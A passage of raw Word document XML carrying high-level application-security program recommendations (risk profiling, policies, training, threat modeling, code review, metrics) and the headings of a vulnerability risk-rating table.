        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="91"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0A0B98" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="91"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026B92A6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="91"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E5A844" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="246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Identify and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prioritize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you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appl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portfolio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> from an inherent risk perspective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C754139" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="257" w:lineRule="exact"/>
        <w:ind w:firstLine="47"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·Create an application risk profiling model to measure and prioritize the applications in your portfolio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495416AD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="257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Establish assurance guidelines to properly define coverage and level of rigor required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F6C510" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="257" w:lineRule="exact"/>
        <w:ind w:firstLine="47"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·Establish a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>commo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risk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rating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model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> with a consistent set of likelihood and impact factors reflective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF2C4F6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="218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of your organization's tolerance for risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7AFC83" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="138"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F36240E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="138"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B11E73B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="377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Establish a set of focused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policies and standards</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> that provide an application security baseline for all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E09A7A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="221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development teams to adhere to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B92FE35" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="257" w:lineRule="exact"/>
        <w:ind w:firstLine="47"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·Define a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>common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set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of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reusable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security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>controls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> that complement these policies and standards and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412F0076" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="218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provide design and development guidance on their use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4331741A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="257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Establish an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>application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ecurit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training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curriculum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> that is required and targeted to different</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FDCFD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="218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development roles and topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DC40E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="138"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7727275F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="138"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341E62FF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="414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Define and integrat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security implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> and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verification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> activities into existing development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8914E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="221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and operational processes.  Activities includ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Threat Modeling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, Secure Design &amp;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Review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, Secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057B0773" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="218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Coding &amp;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Code Review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>,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Penetration Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>, and Remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD97D66" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="257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Provide subject matter experts and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="3A6331"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>suppor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services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for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developmen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and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project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</w:rPr>
        <w:t>teams</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> to be</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AC9BDB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="221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successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E3E652" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="138"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63078F62" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="138"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34149A43" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:firstLine="138"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="156ED941" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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Manage with metrics.  Drive improvement and funding decisions based on the metrics and analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58914F14" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="221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data captured.  Metrics include adherence to security practices / activities, vulnerabilities introduced,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5993A282" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="218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vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE32D1" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="257" w:lineRule="exact"/>
        <w:ind w:firstLine="47"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>·Analyze data from the implementation and verification activities to look for root cause and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74802A61" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="221" w:lineRule="exact"/>
        <w:ind w:firstLine="138"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="96"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vulnerability patterns to drive strategic and systemic improvements across the enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E6BCC0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1860" w:space="0"/>
            <w:col w:w="8940" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E41924" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="20"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="4AA582F9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="510"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="74CE43BA">
          <v:shape id="_x0000_s2096" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:8.6pt;margin-top:513.4pt;width:552pt;height:235.2pt;z-index:251717120;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;v-text-anchor:middle" o:allowincell="f" filled="f" stroked="f">
            <v:textbox inset="1.8pt,.3pt,0,0">
              <w:txbxContent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40"/>
                    <w:gridCol w:w="1740"/>
                    <w:gridCol w:w="1740"/>
                    <w:gridCol w:w="1740"/>
                    <w:gridCol w:w="1740"/>
                    <w:gridCol w:w="1740"/>
                  </w:tblGrid>
                  <w:tr w:rsidR="00C534F5" w14:paraId="314399AC" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="985"/>
                    </w:trPr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1C1FAAFF" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="747" w:lineRule="exact"/>
                          <w:ind w:left="345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hreat</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="05EFB748" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="161" w:lineRule="exact"/>
                          <w:ind w:left="333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gents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5856F2F0" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="488" w:lineRule="exact"/>
                          <w:ind w:left="55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Attack</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1AB2BA5B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="55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Vectors</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                    <w:tc>
                      <w:tcPr>
                        <w:tcW w:w="3480" w:type="dxa"/>
                        <w:gridSpan w:val="2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D9EBD5"/>
                        <w:tcMar>
                          <w:left w:w="0" w:type="dxa"/>
                          <w:right w:w="0" w:type="dxa"/>
                        </w:tcMar>
                      </w:tcPr>
                      <w:p w14:paraId="55A3EE61" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="488" w:lineRule="exact"/>
                          <w:ind w:left="147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Security</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0CFCD75B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="143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Weakness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5ADE88E9" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="530" w:lineRule="exact"/>
                          <w:ind w:left="49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Technical</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="26373E18" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="57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2F2F2"/>
                        <w:tcMar>
                          <w:left w:w="0" w:type="dxa"/>
                          <w:right w:w="0" w:type="dxa"/>
                        </w:tcMar>
                      </w:tcPr>
                      <w:p w14:paraId="3055E454" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="476" w:lineRule="exact"/>
                          <w:ind w:left="61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Business</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6A253A89" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="216" w:lineRule="exact"/>
                          <w:ind w:left="64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274221"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="18"/>
                          </w:rPr>
                          <w:t>Impacts</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00C534F5" w14:paraId="05706A64" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="774"/>
                    </w:trPr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96B37A6" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="553" w:lineRule="exact"/>
                          <w:ind w:left="15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28"/>
                          </w:rPr>
                          <w:t>App Specific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71429ED0" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="386" w:lineRule="exact"/>
                          <w:ind w:left="33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xploitability</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="23D384A8" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="476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AVERAG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FF"/>
                        <w:tcMar>
                          <w:left w:w="0" w:type="dxa"/>
                          <w:right w:w="0" w:type="dxa"/>
                        </w:tcMar>
                      </w:tcPr>
                      <w:p w14:paraId="0494D483" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="386" w:lineRule="exact"/>
                          <w:ind w:left="41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Prevalence</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5CA950E6" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="78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VERY WIDESPREAD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0000"/>
                        <w:tcMar>
                          <w:left w:w="0" w:type="dxa"/>
                          <w:right w:w="0" w:type="dxa"/>
                        </w:tcMar>
                      </w:tcPr>
                      <w:p w14:paraId="669160F1" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="386" w:lineRule="exact"/>
                          <w:ind w:left="340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Detectability</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7240F223" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="66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EASY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FFC000"/>
                        <w:tcMar>
                          <w:left w:w="0" w:type="dxa"/>
                          <w:right w:w="0" w:type="dxa"/>
                        </w:tcMar>
                      </w:tcPr>
                      <w:p w14:paraId="40961AD5" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="386" w:lineRule="exact"/>
                          <w:ind w:left="583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Impact</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5990296E" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="394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19"/>
                          </w:rPr>
                          <w:t>MODERAT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0A9248D1" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="387" w:lineRule="exact"/>
                          <w:ind w:left="13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24"/>
                          </w:rPr>
                          <w:t>App / Business</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="290023F6" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="288" w:lineRule="exact"/>
                          <w:ind w:left="492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000000"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Specific</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                  <w:tr w:rsidR="00C534F5" w14:paraId="58BB6CD4" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="2346"/>
                    </w:trPr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44AE1F85" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:line="288" w:lineRule="exact"/>
                        </w:pP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6FC1D10" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="664" w:lineRule="exact"/>
                          <w:ind w:left="748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323232"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="48"/>
                          </w:rPr>
                          <w:t>2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70F3D04B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="664" w:lineRule="exact"/>
                          <w:ind w:left="748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323232"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="48"/>
                          </w:rPr>
                          <w:t>0</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="548AB326" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="961" w:lineRule="exact"/>
                          <w:ind w:left="748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323232"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="48"/>
                          </w:rPr>
                          <w:t>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680793D7" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="664" w:lineRule="exact"/>
                          <w:ind w:left="74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323232"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="48"/>
                          </w:rPr>
                          <w:t>1</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="05BF938C" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="961" w:lineRule="exact"/>
                          <w:ind w:left="751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323232"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="48"/>
                          </w:rPr>
                          <w:t>*</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="218C1FAD" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="764" w:lineRule="exact"/>
                          <w:ind w:left="748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FF0000"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="48"/>
                          </w:rPr>
                          <w:t>2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17A80412" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="664" w:lineRule="exact"/>
                          <w:ind w:left="74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323232"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="48"/>
                          </w:rPr>
                          <w:t>2</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="23B0E050" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="961" w:lineRule="exact"/>
                          <w:ind w:left="749"/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color w:val="323232"/>
                            <w:w w:val="98"/>
                            <w:sz w:val="48"/>
                          </w:rPr>
                          <w:t>2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 w14:paraId="539A1243" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:line="961" w:lineRule="exact"/>
                        </w:pPr>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="294AEEB6" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5"/>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="28092757">
          <v:shape id="imagerId738" o:spid="_x0000_s2095" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:120pt;height:96pt;z-index:-251691520;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId738" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0236F652">
          <v:shape id="imagerId739" o:spid="_x0000_s2094" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:104pt;margin-top:522pt;width:76pt;height:37pt;z-index:-251690496;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId739" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
